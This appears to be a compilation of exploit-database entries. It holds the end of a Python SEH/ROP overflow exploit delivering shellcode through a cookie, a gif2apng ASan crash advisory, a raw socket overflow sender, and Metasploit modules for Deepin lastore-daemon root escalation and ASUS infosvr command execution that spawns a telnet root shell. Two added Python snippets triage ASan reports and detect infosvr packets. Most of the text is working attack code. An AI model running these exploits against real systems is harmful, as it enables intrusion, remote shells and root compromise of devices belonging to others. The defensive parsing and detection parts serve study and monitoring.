buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]
buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop
buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler
# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
buffer += '\x44' * (5000-4059-4-4)
print "[+] Sending %s bytes of evil payload.." % len(buffer)
time.sleep(1)
try:
    # The oversized buffer is delivered through the UserID cookie
    cookies = dict(SESSIONID='6771', UserID=buffer, PassWD='')
    data = dict(frmLogin='', frmUserName='', frmUserPass='', login='')
    requests.post('http://' + host + ':' + port + '/forum.ghp', cookies=cookies, data=data)
except:
    print "The server stopped responding. You should see calc.exe by now ;D"
# Exploit Title: gif2apng 1.9 '.gif' Stack-Buffer Overflow
# Date: 20 April 2018
# Exploit Author: Hamm3r.py
# Vendor Homepage: http://gif2apng.sourceforge.net/
# Version: 1.9
# Tested on: Ubuntu 16.04
# CVE :
gif2apng 1.9 is vulnerable to a stack-based buffer overflow when a malformed
GIF is supplied. AddressSanitizer reports a one-byte write immediately past the
end of the 4097-byte stack buffer 'str' (frame offset 16977, where 'str'
occupies [12880, 16977)). The full report follows:
$ ./gif2apng fuzz.gif
gif2apng 1.9 using 7ZIP with 15 iterations
Reading 'fuzz.gif'...
=================================================================
==3674==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffb183bcf1 at pc 0x0000004ebdce bp 0x7fffb1837a90 sp 0x7fffb1837a88
WRITE of size 1 at 0x7fffb183bcf1 thread T0
#0 0x4ebdcd (/home/shyam/FUZZ/gif2apng+0x4ebdcd)
#1 0x4ee926 (/home/shyam/FUZZ/gif2apng+0x4ee926)
#2 0x7f4e5642282f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x4199a8 (/home/shyam/FUZZ/gif2apng+0x4199a8)
Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame
#0 0x4eb23f (/home/shyam/FUZZ/gif2apng+0x4eb23f)
This frame has 6 object(s):
[32, 36) 'size'
[48, 8242) 'prefix'
[8512, 12609) 'suffix'
[12880, 16977) 'str' <== Memory access at offset 16977 overflows this variable
[17248, 18272) 'data'
[18400, 18401) 'mincodesize'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/shyam/FUZZ/gif2apng+0x4ebdcd)
Shadow bytes around the buggy address:
0x1000762ff740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000762ff790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]f2
0x1000762ff7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7b0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3674==ABORTING
Version of software in use:
./gif2apng
gif2apng 1.9
# This issue was identified by Hamm3r.py, a general-purpose fuzzer:
# https://github.com/0xshyam/hamm3r.py
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44519.zip
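To turn a report like the one above into a triage verdict, the following added Python example (not part of the advisory or of gif2apng) parses the frame object list AddressSanitizer prints and reports which stack object the faulting access runs past, by how much, and whether it reaches the next object. The sample text is copied from the report on this page.

```python
import re

# Constructed sample: the relevant lines of the gif2apng ASan report above.
SAMPLE_REPORT = """\
WRITE of size 1 at 0x7fffb183bcf1 thread T0
Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame
This frame has 6 object(s):
  [32, 36) 'size'
  [48, 8242) 'prefix'
  [8512, 12609) 'suffix'
  [12880, 16977) 'str' <== Memory access at offset 16977 overflows this variable
  [17248, 18272) 'data'
  [18400, 18401) 'mincodesize'
"""

OBJECT_RE = re.compile(r"\[(\d+), (\d+)\) '([^']+)'")
ACCESS_RE = re.compile(r"(READ|WRITE) of size (\d+) at 0x[0-9a-f]+")
OFFSET_RE = re.compile(r"at offset (\d+) in frame")


def parse_frame_objects(report):
    """Return [(start, end, name)] for every stack object ASan listed."""
    return [(int(s), int(e), n) for s, e, n in OBJECT_RE.findall(report)]


def triage_stack_overflow(report):
    """Locate the faulting access relative to the frame's objects.

    Returns the access kind and size, the object the access runs past,
    that object's size, how many bytes past its end the access starts,
    the slack (redzone plus padding) before the next object, and whether
    the access reaches into that next object.
    """
    access = ACCESS_RE.search(report)
    offset = OFFSET_RE.search(report)
    if not access or not offset:
        raise ValueError("not a stack-buffer-overflow report")
    kind, size = access.group(1), int(access.group(2))
    off = int(offset.group(1))
    objects = sorted(parse_frame_objects(report))
    # The overflowed object is the last one starting at or before the access.
    victim = max((o for o in objects if o[0] <= off), key=lambda o: o[0])
    later = [o for o in objects if o[0] > victim[0]]
    next_start = later[0][0] if later else None
    return {
        "kind": kind,
        "size": size,
        "object": victim[2],
        "object_size": victim[1] - victim[0],
        "bytes_past_end": off - victim[1],
        "gap_to_next_object": (next_start - victim[1]) if next_start else None,
        "reaches_next_object": next_start is not None and off + size > next_start,
    }
```

For this report the write lands exactly at the end of the 4097-byte 'str' and is absorbed by the 271-byte redzone before 'data', which is why only ASan, not a plain build, notices it.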
#!/usr/bin/python
import socket
import sys
from struct import pack

try:
    server = sys.argv[1]
    port = 9121
    size = 1000

    inputBuffer = b"\x41" * size

    # Protocol header: magic, command id, flags, then the buffer length twice
    # and the value of the final buffer byte
    header = b"\x75\x19\xba\xab"
    header += b"\x03\x00\x00\x00"
    header += b"\x00\x40\x00\x00"
    header += pack('<I', len(inputBuffer))
    header += pack('<I', len(inputBuffer))
    header += pack('<I', inputBuffer[-1])

    buf = header + inputBuffer

    print("Sending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.send(buf)
    s.close()
    print("Done!")
except socket.error:
    print("Could not connect!")
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'lastore-daemon D-Bus Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          "King's Way",    # Discovery and exploit
          'Brendan Coles'  # Metasploit
        ],
      'DisclosureDate' => 'Feb 2 2016',
      'References'     =>
        [
          [ 'EDB', '39433' ],
          [ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
        ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def mkdir(path)
    vprint_status "Creating '#{path}' directory"
    cmd_exec "mkdir -p #{path}"
    register_dir_for_cleanup path
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def command_exists?(cmd)
    cmd_exec("command -v #{cmd} && echo true").include? 'true'
  end

  def dbus_priv?
    res = install_package '', ''
    (res.include? 'DBus.Error.AccessDenied') ? false : true
  end

  def install_package(name, path)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.InstallPackage',
              contents: "string:'#{name}' string:'#{path}'"
  end

  def remove_package(name)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.RemovePackage',
              contents: "string:' ' string:'#{name}'"
  end

  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end

  def check
    %w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
      unless command_exists? cmd
        vprint_error "#{cmd} is not installed. Exploitation will fail."
        return CheckCode::Safe
      end
      vprint_good "#{cmd} is installed"
    end

    unless dbus_priv?
      vprint_error 'User is not permitted to install packages. Exploitation will fail.'
      return CheckCode::Safe
    end
    vprint_good 'User is permitted to install packages'

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    print_status 'Building package...'
    payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{payload_name}"
    pkg_name = rand_text_alphanumeric rand(10..15)
    pkg_path = "#{base_dir}/.#{pkg_name}"

    mkdir "#{pkg_path}/DEBIAN"

    pkg = "Package: #{pkg_name}\n"
    pkg << "Version: 0.1\n"
    pkg << "Maintainer: #{pkg_name}\n"
    pkg << "Architecture: all\n"
    pkg << "Description: #{pkg_name}\n"
    upload "#{pkg_path}/DEBIAN/control", pkg

    upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"

    cmd_exec "dpkg-deb --build '#{pkg_path}'"

    unless file_exist? "#{pkg_path}.deb"
      fail_with Failure::Unknown, 'Building package failed'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Installing package...'
    res = install_package pkg_name, "#{pkg_path}.deb"
    vprint_line res

    unless res.include? 'object path'
      fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
    end

    Rex.sleep 15

    print_status 'Removing package...'
    res = remove_package pkg_name.downcase
    vprint_line res

    unless res.include? 'object path'
      print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
    end
  end
end
The attached fuzzed SWF file causes a heap overflow when a sound is played.
This PoC crashes somewhat unreliably; it is most reliable in the standalone Flash Player and in Microsoft Edge.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44526.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ASUS infosvr Auth Bypass Command Execution',
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability in the
        infosvr service running on UDP port 9999 on various ASUS routers to
        execute arbitrary commands as root.

        This module launches the BusyBox Telnet daemon on the port specified
        in the TelnetPort option to gain an interactive remote shell.

        This module was tested successfully on an ASUS RT-N12E with firmware
        version 2.0.0.35.

        Numerous ASUS models are reportedly affected, but untested.
      },
      'Author'         =>
        [
          'Friedrich Postelstorfer',            # Initial public disclosure and Python exploit
          'jduck',                              # Independent discovery and C exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'References'     =>
        [
          ['CVE', '2014-9583'],
          ['EDB', '35688'],
          ['URL', 'https://github.com/jduck/asus-cmd']
        ],
      'DisclosureDate' => 'Jan 4 2015',
      'Privileged'     => true,
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0))
    register_options [
      Opt::RPORT(9999),
      OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
      OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
      OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
    ]
    register_advanced_options [
      # If the session is killed (CTRL+C) rather than exiting cleanly,
      # the telnet port remains open, but is unresponsive, and prevents
      # re-exploitation until the device is rebooted.
      OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
    ]
  end

  def telnet_timeout
    (datastore['TelnetTimeout'] || 10)
  end

  def telnet_port
    datastore['TelnetPort']
  end

  def request(cmd)
    pkt = ''
    # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
    pkt << "\x0C"
    # PacketType [byte] ; NET_PACKET_TYPE_CMD
    pkt << "\x15"
    # OpCode [word] ; NET_CMD_ID_MANU_CMD
    pkt << "\x33\x00"
    # Info [dword] ; Comment: "Or Transaction ID"
    pkt << Rex::Text.rand_text_alphanumeric(4)
    # MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
    pkt << Rex::Text.rand_text_alphanumeric(6)
    # Password [byte[32]] ; Not checked at all
    pkt << "\x00" * 32
    # Command Length + \x00 + Command padded to 512 bytes
    pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
  end

  def exploit
    connect_udp
    print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
    udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
    disconnect_udp

    vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
    Rex.sleep 3

    vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
    sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
                                  'PeerPort' => telnet_port,
                                  'Context'  => { 'Msf' => framework, 'MsfExploit' => self },
                                  'Timeout'  => telnet_timeout
    if sock.nil?
      fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
    end

    vprint_status "#{rhost} - Trying to establish a telnet session..."
    prompt = negotiate_telnet sock
    if prompt.nil?
      sock.close
      fail_with Failure::Unknown, 'Unable to establish a telnet session'
    end

    print_good "#{rhost} - Telnet session successfully established..."
    handler sock
  end

  def negotiate_telnet(sock)
    prompt = '#'
    Timeout.timeout(datastore['TelnetBannerTimeout']) do
      while true
        data = sock.get_once(-1, telnet_timeout)
        if !data or data.length == 0
          return nil
        elsif data.include? prompt
          return true
        end
      end
    end
  rescue ::Timeout::Error
    return nil
  end
end
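A detection-side counterpart to the request() layout documented in the module above, added here and not part of the Metasploit module: it decodes a UDP/9999 datagram using the field layout and constant names from the module's comments and flags manufacturer-command packets, which is the path the missing password check leaves open. The sample datagram is constructed inline with a harmless placeholder command.

```python
import struct

# Field layout from the module's request() comments:
# ServiceID(1) PacketType(1) OpCode(2, LE) Info(4) MacAddress(6) Password(32),
# then a length byte, a NUL, the command, and NUL padding to 512 bytes total.
HEADER = struct.Struct('<BBH4s6s32s')
SERVICE_ID_IBOX_INFO = 0x0C   # NET_SERVICE_ID_IBOX_INFO
PACKET_TYPE_CMD = 0x15        # NET_PACKET_TYPE_CMD
CMD_ID_MANU_CMD = 0x0033      # NET_CMD_ID_MANU_CMD
PACKET_LEN = 512


def parse_infosvr(pkt):
    """Decode one datagram; returns None if it is not infosvr-shaped."""
    if len(pkt) != PACKET_LEN:
        return None
    svc, ptype, opcode, info, mac, password = HEADER.unpack_from(pkt, 0)
    body = pkt[HEADER.size:]
    cmd = None
    if ptype == PACKET_TYPE_CMD and opcode == CMD_ID_MANU_CMD:
        cmd_len = body[0]
        # Length byte must be followed by the NUL the daemon expects
        if body[1] == 0 and cmd_len <= len(body) - 2:
            cmd = body[2:2 + cmd_len]
    return {'service_id': svc, 'packet_type': ptype, 'opcode': opcode,
            'password_blank': password == b'\x00' * 32, 'command': cmd}


def is_manu_cmd(pkt):
    """True when the datagram is a manufacturer command (the unauthenticated path)."""
    p = parse_infosvr(pkt)
    return bool(p and p['service_id'] == SERVICE_ID_IBOX_INFO
                and p['packet_type'] == PACKET_TYPE_CMD
                and p['opcode'] == CMD_ID_MANU_CMD)


# Constructed sample datagram in the documented layout (placeholder command).
SAMPLE_CMD = b'echo detection-test'
SAMPLE_PKT = (HEADER.pack(SERVICE_ID_IBOX_INFO, PACKET_TYPE_CMD, CMD_ID_MANU_CMD,
                          b'ABCD', b'ABCDEF', b'\x00' * 32)
              + bytes([len(SAMPLE_CMD)]) + b'\x00' + SAMPLE_CMD).ljust(PACKET_LEN, b'\x00')
```

A monitor on UDP/9999 can log any datagram for which is_manu_cmd() is true, together with the decoded command; legitimate discovery traffic from the vendor tools does not use this opcode on an all-zero password.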